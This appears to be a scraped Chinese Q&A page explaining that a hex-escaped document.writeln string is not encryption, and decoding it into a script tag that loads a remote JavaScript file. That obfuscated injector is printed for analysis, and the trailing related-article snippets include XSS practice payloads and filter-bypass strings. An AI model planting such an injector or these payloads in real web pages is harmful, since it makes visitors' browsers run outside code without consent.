document.write("\x3c\x54")?是加密了吗?

<script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x48\x54\x54\x50\x3A\x2F\x2F\x4F\x46\x46\x49\x43\x45\x2E\x46\x41\x51\x53\x45\x52\x56\x2E\x43\x4F\x4D\x2F\x66\x61\x71\x2E\x4A\x53\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script>
这是什么编码?怎样转成正常代码?

这其实不是加密,是用的字符的ASCII码的16进制形式表示的。

上面的结果是:

<script src="http://OFFICE.FAQSERV.COM/faq.JS"></script>

要转正常,很简单,直接输出:

<script>window.alert("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x48\x54\x54\x50\x3A\x2F\x2F\x4F\x46\x46\x49\x43\x45\x2E\x46\x41\x51\x53\x45\x52\x56\x2E\x43\x4F\x4D\x2F\x66\x61\x71\x2E\x4A\x53\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script>

时间: 2024-09-05 12:08:45

document.write("\x3c\x54")?是加密了吗?的相关文章

ajax_jsonp_php加密_跨域例子

服务端 php <?php header("Content-Type:text/html;charset=UTF-8"); // $string: 明文 或 密文 // $operation:DECODE表示解密,其它表示加密 // $key: 密匙 // $expiry:密文有效期 function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) { // 动态密匙长度,相同的明文会生成不同密文就

xss challenges平台学习

虽然在很早之前就接触过xss,有一段时间还就着一本书研究过,但是始终没有实感,掌握的也不够系统,所以现在借着这几个平台再学习一遍 首先来玩一玩xss challenge平台 第一关:http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9 第二关:http://xss-quiz.int21h.jp/stage2.php?sid=f2d7d60125bdddb208fa757ee5cdae22f6818cd1 提

XSS quiz练习题做题过程及感悟

XSS quiz 最近刚学XSS.所以新手理解如有错误不当,欢迎批评指正. 第1题 一开始做,使用了Chrome浏览器.第一题怎么都做不出来.突然想起来使用IE,打开IE11,才成功了. <script>alert(document.domain);</script> 第2题 第二题,直接用这个不行. 查看源代码. 构造一个,把左边的< input ..... 封掉. "><script>alert(document.domain);</sc

xss challenge 解题思路(8-18)

challenge 8: js伪协议的应用,请使用ie浏览器 输入如下javascript:alert(document.domain); challenge 9 : 提示要用utf-7 xss来做,不过我是没做出来. challenge 10: 这次发现过滤了domain,可以如下构造" onmouseover=alert(document.domadomainin);  这样过滤掉domain后会构成新的domain challenge 11 "><a href=&qu

XSS Challenges

Stage #1: http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9 Hint: very simple... 按照要求输入<script>alert(document.domain);</script> 过关 Stage #2 http://xss-quiz.int21h.jp/stage2.php?sid=9532df794eb7055cab4e31fbac353c0df1960148

XSS Challenges xss-quiz.int21h.jp

概述: https://xss-quiz.int21h.jp/ Stage #1 payload: <script>alert(document.domain);</script> Stage #2 http://xss-quiz.int21h.jp/stage2.php?sid=e93e71eed43c3ab5668af6a5aa603cf66eedce70 尝试: <script>alert(document.domain);</script> 未果 i

python实现网页登录时的rsa加密流程

对某些网站的登录包进行抓包时发现,客户端对用户名进行了加密,然后传给服务器进行校验. 使用chrome调试功能断点调试,发现网站用javascript对用户名做了rsa加密. 为了实现网站的自动登录,需要模拟这个加密过程. 网上搜了下关于rsa加密的最简明的解释: rsa加密是非对称加密算法,该算法基于一个十分简单的数论事实:将两个大素数相乘十分容易,但那时想要对其乘积进行因式分解却极其困难,因此可以将乘积公开作为加密密钥,即公钥,而两个大素数组合成私钥.公钥是可发布的供任何人使用,私钥则为自己

1、网页后退 2、瀑布流 3、上下左右的阿斯科码值 4、加密技术

1.网页后退 /前进  <a href="javascript:history.go(-1);">后退</a><a href="javascript:history.go(1);">前进</a> 2.瀑布流              瀑布流是目前一种比较流行的页面布局和加载效果.百度,花瓣等一些好的网站都广泛用了这样一种效果,适用于单页面展示对内容的页面.这几天就跟着一些资料学习了一下瀑布流效果的制作.其原理是利用js

用C#实现MD5的加密(转载)

方法一 首先,先简单介绍一下MD5 MD5的全称是message-digest algorithm 5(信息-摘要算法,在90年代初由mit laboratory for computer science和rsa data security inc的ronald l. rivest开发出来, 经md2.md3和md4发展而来. MD5具有很好的安全性(因为它具有不可逆的特征,加过密的密文经过解密后和加密前的东东相同的可能性极小) 引用 using System.Security.Cryptogr